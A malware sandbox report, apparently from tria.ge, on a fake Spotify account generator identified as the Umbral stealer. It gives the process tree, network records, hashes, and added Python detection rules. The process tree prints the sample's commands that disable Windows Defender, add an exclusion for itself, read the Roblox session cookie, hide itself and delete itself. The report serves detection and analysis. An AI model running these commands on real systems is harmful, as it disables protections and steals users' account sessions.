Analysis

max time kernel: 18s
max time network: 19s
platform: windows11-21h2_x64
resource: win11-20240709-en
resource tags: arch:x64, arch:x86, image:win11-20240709-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 25-07-2024 02:26
Behavioral tasks

behavioral1  Sample: DD Spotify Acc Gen.exe  Resource: win10-20240404-en
behavioral2  Sample: DD Spotify Acc Gen.exe  Resource: win7-20240705-en
behavioral3  Sample: DD Spotify Acc Gen.exe  Resource: win10v2004-20240709-en

The signatures, process tree and network records on this page come from the win11-20240709-en run (behavioral4, the task named in the YARA memory hit below), not from the three tasks listed above.
General

Target: DD Spotify Acc Gen.exe
Size: 296KB
MD5: c4cf132278a366635533a2734901aa95
SHA1: 06ea6b94f8accb59c3115c67208a1116a12a7f1e
SHA256: 382f9d13e5a5945980c767ec1d98732d971a4e07bdb9ed1950d6c455edbb203a
SHA512: d6f4343892a266db8b62892d0c8eef5e63492f49e237d704cf2c5237fe5249f948dbbc8471ae2db00a862af9d7658c6286a72a0f3134786dae82d5fad72eb120
SSDEEP: 6144:dloZM+rIkd8g+EtXHkv/iD4PaIWVjgULYyD1Ac5eIb8e1mWiQ:/oZVL+EP8PaIWVjgULYyD1Ac5n0
Malware Config
Signatures
Detect Umbral payload (1 IoC)
  yara_rule: family_umbral
  resource: behavioral4/memory/3332-0-0x0000017578C40000-0x0000017578C90000-memory.dmp (a memory region of PID 3332, the sample itself)
  This is an in-memory match only; the behaviours recorded below (Defender tampering via Set-MpPreference, the ip-api.com lookup, the Roblox cookie read, discord.com traffic, self-deletion) are consistent with the Umbral stealer family.

Credentials from Password Stores: Credentials from Web Browsers (1 TTP)
  Malicious access to, or copy of, a web browser credential store.

Command and Scripting Interpreter: PowerShell (4 IoCs)
  pid   Process
  2320  powershell.exe
  3168  powershell.exe
  2752  powershell.exe
  3600  powershell.exe
  (These are the four PowerShell children carrying this tag in the process tree below.)

Drops file in Drivers directory (1 IoC)
  File opened for modification: C:\Windows\System32\drivers\etc\hosts  Process: DD Spotify Acc Gen.exe
  The path is under drivers\ but the file is the hosts resolver file, not a driver; a write there changes local name resolution. The report records only that the file was opened for writing, not what was written.

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  4     discord.com
  6     discord.com

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  1     ip-api.com

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid   Process
  4440  cmd.exe
  2880  PING.EXE
  (The ping target here is localhost, so in this run it is a delay before self-deletion, not a connectivity check; see the process tree.)

Detects videocard installed (1 TTP, 1 IoC)
  Uses WMIC.exe to determine the installed video card.
  pid   Process
  248   wmic.exe

Runs ping.exe (1 TTP, 1 IoC)
  pid   Process
  2880  PING.EXE

Suspicious behavior: EnumeratesProcesses (11 IoCs)
  pid   Process
  3332  DD Spotify Acc Gen.exe
  3600  powershell.exe (x2)
  2320  powershell.exe (x2)
  3168  powershell.exe (x2)
  444   powershell.exe (x2)
  2752  powershell.exe (x2)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid   Process                 Tokens enabled
  3332  DD Spotify Acc Gen.exe  SeDebugPrivilege
  2920  wmic.exe                SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this full set is reported twice for PID 2920; 33 to 36 are privilege IDs the report leaves unresolved)
  3600  powershell.exe          SeDebugPrivilege
  2320  powershell.exe          SeDebugPrivilege
  3168  powershell.exe          SeDebugPrivilege
  444   powershell.exe          SeDebugPrivilege
  1568  wmic.exe                SeIncreaseQuotaPrivilege through SeManageVolumePrivilege, the same set as PID 2920; the report stops at exactly 64 entries, so this list is cut short
  wmic.exe enabling every privilege already present in its token is normal for that binary and is not an indicator by itself. The SeDebugPrivilege enabled by the sample and its PowerShell children is the entry worth noting.

Suspicious use of WriteProcessMemory (26 IoCs)
  Each parent/child pair appears twice in the report; listed once here.
  pid   Process                 wrote to  procid_target
  3332  DD Spotify Acc Gen.exe  2920      83
  3332  DD Spotify Acc Gen.exe  2028      86
  3332  DD Spotify Acc Gen.exe  3600      88
  3332  DD Spotify Acc Gen.exe  2320      91
  3332  DD Spotify Acc Gen.exe  3168      93
  3332  DD Spotify Acc Gen.exe  444       95
  3332  DD Spotify Acc Gen.exe  1568      97
  3332  DD Spotify Acc Gen.exe  5092      99
  3332  DD Spotify Acc Gen.exe  1800      101
  3332  DD Spotify Acc Gen.exe  2752      103
  3332  DD Spotify Acc Gen.exe  248       105
  3332  DD Spotify Acc Gen.exe  4440      107
  4440  cmd.exe                 2880      109
  Every target is a direct child the writer had just created, in tree order, so this matches ordinary process creation rather than injection into an unrelated process.

Views/modifies file attributes (1 TTP, 1 IoC)
  pid   Process
  2028  attrib.exe
Processes

C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe  (PID 3332)
  "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\Wbem\wmic.exe  (PID 2920, child of 3332)
    "wmic.exe" csproduct get uuid
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SYSTEM32\attrib.exe  (PID 2028, child of 3332)
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"
    - Views/modifies file attributes
    Marks its own binary hidden and system so it is not shown in a default directory listing.

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3600, child of 3332)
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2320, child of 3332)
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    Add-MpPreference and Set-MpPreference require administrator rights, and Tamper Protection blocks most of these switches when it is on. Where they do succeed, real-time monitoring, IOAV, script scanning, IPS and cloud reporting stay off and the exclusion persists across reboots. On a suspect host check Get-MpPreference (ExclusionPath, DisableRealtimeMonitoring) and the Microsoft-Windows-Windows Defender/Operational log for event ID 5007 (configuration changed).

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3168, child of 3332)
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    Reads the Roblox Studio session cookie (.ROBLOSECURITY) from the current user's registry hive.

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 444, child of 3332)
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    Command line as executed by the sample. HKLN: is not a PowerShell drive (HKLM: is), so this machine-wide read fails.

  C:\Windows\System32\Wbem\wmic.exe  (PID 1568, child of 3332)
    "wmic.exe" os get Caption
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\Wbem\wmic.exe  (PID 5092, child of 3332)
    "wmic.exe" computersystem get totalphysicalmemory

  C:\Windows\System32\Wbem\wmic.exe  (PID 1800, child of 3332)
    "wmic.exe" csproduct get uuid

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2752, child of 3332)
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\Wbem\wmic.exe  (PID 248, child of 3332)
    "wmic" path win32_VideoController get name
    - Detects videocard installed
    Together with the uuid, OS caption, RAM and CPU queries above this fingerprints the host.

  C:\Windows\SYSTEM32\cmd.exe  (PID 4440, child of 3332)
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe" && pause
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    Self-deletion: ping localhost is a delay so the parent can exit, then del removes the binary. /A h is needed because attrib +h was set earlier and del skips hidden files by default; /F also removes it if read-only.

    C:\Windows\system32\PING.EXE  (PID 2880, child of 4440)
      ping localhost
      - System Network Configuration Discovery: Internet Connection Discovery
      - Runs ping.exe
      The target is localhost, so despite the tag this is a sleep, not an Internet connectivity check.
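The process tree is the most reusable part of this report: every behaviour is a plain command line. The Python below is added here as an illustration (it is not tria.ge code and not the sample's code). It turns the tree above into a small detection: one regex per behaviour, rolled up per parent process so that the combination, rather than any single child, produces the verdict. The event records are constructed from the command lines and PIDs above; the pid/ppid/image/cmdline schema is an assumed generic process-creation event, and the sample's own parent PID (given as 0) is not in the report.

```python
"""Classify the sample's child processes from the process tree above.

Added example for this page: not tria.ge code, not the stealer's code.
EVENTS is constructed from the command lines and PIDs in the report; the
(pid, ppid, image, cmdline) schema is an assumed generic process-creation
event, and ppid 0 for the sample stands in for a parent the report omits.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree (PIDs and order as reported).
EVENTS = [
    ProcEvent(3332, 0, SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(2920, 3332, WMIC, '"wmic.exe" csproduct get uuid'),
    ProcEvent(2028, 3332, r"C:\Windows\SYSTEM32\attrib.exe",
              '"attrib.exe" +h +s "' + SAMPLE + '"'),
    ProcEvent(3600, 3332, POWERSHELL,
              "\"powershell.exe\" Add-MpPreference -ExclusionPath '" + SAMPLE + "'"),
    ProcEvent(2320, 3332, POWERSHELL,
              '"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
              '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true '
              '-DisableScriptScanning $true -EnableControlledFolderAccess Disabled '
              '-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled '
              '-SubmitSamplesConsent NeverSend && powershell Set-MpPreference '
              '-SubmitSamplesConsent 2'),
    ProcEvent(3168, 3332, POWERSHELL,
              r'"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'),
    ProcEvent(444, 3332, POWERSHELL,
              r'"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'),
    ProcEvent(1568, 3332, WMIC, '"wmic.exe" os get Caption'),
    ProcEvent(5092, 3332, WMIC, '"wmic.exe" computersystem get totalphysicalmemory'),
    ProcEvent(1800, 3332, WMIC, '"wmic.exe" csproduct get uuid'),
    ProcEvent(2752, 3332, POWERSHELL,
              "\"powershell.exe\" Get-ItemPropertyValue -Path "
              "'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' "
              "-Name PROCESSOR_IDENTIFIER"),
    ProcEvent(248, 3332, WMIC, '"wmic" path win32_VideoController get name'),
    ProcEvent(4440, 3332, r"C:\Windows\SYSTEM32\cmd.exe",
              '"cmd.exe" /c ping localhost && del /F /A h "' + SAMPLE + '" && pause'),
    ProcEvent(2880, 4440, r"C:\Windows\system32\PING.EXE", "ping localhost"),
]

# One regex per behaviour, written against the strings in this report plus
# obvious variants (attrib vs attrib.exe, wmic vs wmic.exe). A starting point,
# not a complete signature for the family.
RULES = [
    ("defender_tamper", re.compile(
        r"Set-MpPreference\b.*?-(?:Disable\w+\s+\$true|MAPSReporting\s+Disabled|SubmitSamplesConsent)", re.I)),
    ("defender_exclusion", re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.I)),
    ("hide_own_binary", re.compile(r'attrib(?:\.exe)?"?\s+(?:\+[hsr]\s+)*\+[hs]\b', re.I)),
    ("self_delete", re.compile(r"\bping\b[^&]*&&\s*del\b", re.I)),
    ("roblox_cookie_theft", re.compile(r"\.ROBLOSECURITY\b", re.I)),
    ("hw_fingerprint", re.compile(
        r"csproduct\s+get\s+uuid|os\s+get\s+caption|totalphysicalmemory|win32_VideoController|PROCESSOR_IDENTIFIER", re.I)),
]


def classify(cmdline):
    """Behaviour tags matched by a single command line."""
    return {tag for tag, rx in RULES if rx.search(cmdline)}


def lineage_tags(events, root_pid):
    """Union of tags over root_pid and all its descendants, so the cmd.exe ->
    PING.EXE hop and the many PowerShell children roll up to the sample."""
    children = defaultdict(list)
    by_pid = {}
    for e in events:
        children[e.ppid].append(e.pid)
        by_pid[e.pid] = e
    tags, stack = set(), [root_pid]
    while stack:
        pid = stack.pop()
        if pid in by_pid:
            tags |= classify(by_pid[pid].cmdline)
        stack.extend(children.get(pid, ()))
    return tags


# Individually these are noisy (admins add exclusions, installers query WMI);
# the combination under one parent is what marks this run as a stealer.
STEALER_PATTERN = {"defender_tamper", "defender_exclusion", "roblox_cookie_theft", "self_delete"}


def is_stealer_lineage(events, root_pid):
    return STEALER_PATTERN <= lineage_tags(events, root_pid)


if __name__ == "__main__":
    for e in EVENTS:
        print(e.pid, e.ppid, sorted(classify(e.cmdline)))
    print("stealer pattern under PID 3332:", is_stealer_lineage(EVENTS, 3332))
```

Run as a script it prints the tag set per PID and the rollup verdict for PID 3332. The rollup is the point: an exclusion added by an administrator or a lone wmic query produces one tag, while this sample's parent collects all six.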
Network

DNS (all queries to 8.8.8.8:53)
  gstatic.com                   A    216.58.201.99
  ip-api.com                    A    208.95.112.1
  8.8.8.8.in-addr.arpa          PTR  dns.google
  1.112.95.208.in-addr.arpa     PTR  ip-api.com
  1.112.95.208.in-addr.arpa     PTR  (no response recorded)
  99.201.58.216.in-addr.arpa    PTR  prg03s02-in-f3.1e100.net, prg03s02-in-f99.1e100.net, lhr48s48-in-f3.1e100.net
  discord.com                   A    162.159.128.233, 162.159.136.232, 162.159.138.232, 162.159.135.232, 162.159.137.232
  233.128.159.162.in-addr.arpa  PTR  (empty response)

HTTP to 208.95.112.1:80 (ip-api.com), plaintext
  Request 1
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
  Response 1
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  Request 2
    GET /json/?fields=225545 HTTP/1.1
    Host: ip-api.com
  Response 2
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    Content-Length: 161
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44

  The first request asks ip-api.com only whether the client address is hosting (datacenter) space, a true/false answer a sample can use to recognise an analysis VM; the second asks for a fixed set of fields selected by the numeric fields bitmask. Neither response body is captured in the report, only the 6-byte and 161-byte lengths. No plaintext request to discord.com is shown; that traffic appears only as the DNS answers above and as flows 4 and 6 in the signatures.
Flow summary (columns as in the report: bytes, bytes, packets, packets; remote endpoints are not preserved in this extract)
  803 B     5.3 kB   8    8
  362 B     482 B    6    3    HTTP: GET http://ip-api.com/line/?fields=hosting -> 200
  377 B     550 B    7    5    HTTP: GET http://ip-api.com/json/?fields=225545 -> 200
  569.7 kB  21.1 kB  425  274
  321 B     330 B    5    4    DNS: gstatic.com -> 216.58.201.99; ip-api.com -> 208.95.112.1; 8.8.8.8.in-addr.arpa; 1.112.95.208.in-addr.arpa (x2)
  203 B     442 B    3    3    DNS: 99.201.58.216.in-addr.arpa; discord.com -> 162.159.128.233, 162.159.136.232, 162.159.138.232, 162.159.135.232, 162.159.137.232; 233.128.159.162.in-addr.arpa
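The two ip-api.com requests differ only in their fields parameter, which that service accepts either as a comma-separated list or as a numeric bitmask. The Python below, an added example rather than anything from the report or the sample, decodes that parameter and flags the two services named in the signatures in the HTTP and DNS records. The records are constructed copies of the ones shown above; the bit-to-field table is reproduced from the ip-api.com API documentation as remembered and is an assumption to verify against the live docs before reusing the field names.

```python
"""Network triage for the DNS/HTTP records above.

Added example for this page: not tria.ge code, not the stealer's code.
HTTP_REQUESTS and DNS_ANSWERS are constructed copies of the report's records.
IPAPI_FIELD_BITS is reproduced from the ip-api.com API docs from memory and
is an assumption; verify it against the live documentation.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed from the report: (remote address, request line, Host header).
HTTP_REQUESTS = [
    ("208.95.112.1", "GET /line/?fields=hosting HTTP/1.1", "ip-api.com"),
    ("208.95.112.1", "GET /json/?fields=225545 HTTP/1.1", "ip-api.com"),
]
# Constructed from the report's A-record answers (PTR lookups omitted).
DNS_ANSWERS = {
    "gstatic.com": ["216.58.201.99"],
    "ip-api.com": ["208.95.112.1"],
    "discord.com": ["162.159.128.233", "162.159.136.232", "162.159.138.232",
                    "162.159.135.232", "162.159.137.232"],
}

# Assumed ip-api.com numeric field values (bit -> field name).
IPAPI_FIELD_BITS = {
    1: "country", 2: "countryCode", 4: "region", 8: "regionName", 16: "city",
    32: "zip", 64: "lat", 128: "lon", 256: "timezone", 512: "isp", 1024: "org",
    2048: "as", 4096: "district", 8192: "query", 16384: "status",
    32768: "message", 65536: "reverse", 131072: "proxy", 524288: "mobile",
    1048576: "continent", 2097152: "continentCode", 4194304: "asname",
    8388608: "currency", 16777216: "hosting", 33554432: "offset",
}

# Services the signatures above call out, and why they matter in this run.
WATCHLIST = {
    "ip-api.com": "external IP lookup; hosting/proxy answers tell the sample "
                  "whether it runs in datacenter or VPN address space",
    "discord.com": "legitimate service abused for C2/exfiltration (see signature)",
}


def decode_fields(value):
    """fields= is a comma list or a bitmask; return field names in bit order.
    Unknown bits become 'bit<N>' instead of being silently dropped."""
    if not value:
        return []
    if not value.isdigit():
        return value.split(",")
    mask, names, bit = int(value), [], 1
    while bit <= mask:
        if mask & bit:
            names.append(IPAPI_FIELD_BITS.get(bit, f"bit{bit}"))
        bit <<= 1
    return names


def parse_request_line(line):
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return method, parts.path, query


def match_watchlist(name):
    """Return the watchlisted service a hostname belongs to, or None."""
    for svc in WATCHLIST:
        if name == svc or name.endswith("." + svc):
            return svc
    return None


def triage_http(requests):
    findings = []
    for remote, line, host in requests:
        svc = match_watchlist(host)
        if svc is None:
            continue
        method, path, query = parse_request_line(line)
        finding = {"host": host, "remote": remote, "method": method,
                   "path": path, "why": WATCHLIST[svc]}
        if svc == "ip-api.com":
            fields = decode_fields(query.get("fields", ""))
            finding["fields"] = fields
            # hosting/proxy are the fields that answer "is this an analysis box?"
            finding["env_check"] = bool({"hosting", "proxy"} & set(fields))
        findings.append(finding)
    return findings


def triage_dns(answers):
    hits = {}
    for name, addrs in answers.items():
        svc = match_watchlist(name)
        if svc is not None:
            hits[name] = {"why": WATCHLIST[svc], "addresses": list(addrs)}
    return hits


if __name__ == "__main__":
    for f in triage_http(HTTP_REQUESTS):
        print(f)
    for name, info in triage_dns(DNS_ANSWERS).items():
        print(name, info)
```

Run as a script it prints both ip-api.com requests with their decoded field lists and the discord.com resolution; gstatic.com is not on the watchlist and is left alone. The env_check flag is what to alert on in proxy logs: a plain geolocation lookup is common, a request that asks specifically for hosting or proxy status is not.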
MITRE ATT&CK Enterprise v15

Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads

File 1
  Filesize: 2KB
  MD5: 627073ee3ca9676911bee35548eff2b8
  SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
  SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
  SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

File 2
  Filesize: 944B
  MD5: 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
  SHA1: 9910190edfaccece1dfcc1d92e357772f5dae8f7
  SHA256: 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
  SHA512: 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

File 3
  Filesize: 948B
  MD5: 45741c307af2576c6437c5fdb24ef9ce
  SHA1: a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf
  SHA256: 7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2
  SHA512: 39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

File 4
  Filesize: 1KB
  MD5: 0ac871344dc49ae49f13f0f88acb4868
  SHA1: 5a073862375c7e79255bb0eab32c635b57a77f98
  SHA256: 688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
  SHA512: ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

File 5
  Filesize: 1KB
  MD5: c321dfee531730b7e0b81470b947da3f
  SHA1: 0488401f4fc03bcdab19eeff194ff12f4439e1cb
  SHA256: 6d7da148fe930cf085b5369427eb24e66844d7f00fcc197f056e0763c7a76117
  SHA512: eee78a9529b1d89631ac8dbaef716eba95166d8c465a2c075bf89d28fab4c25a48c4d29d7f19ab0249b245bf45fac63214b092aaef9b3a09b4f8e6cfa85a076a

File 6
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

(The report gives no file names or paths for these artifacts, only sizes and hashes.)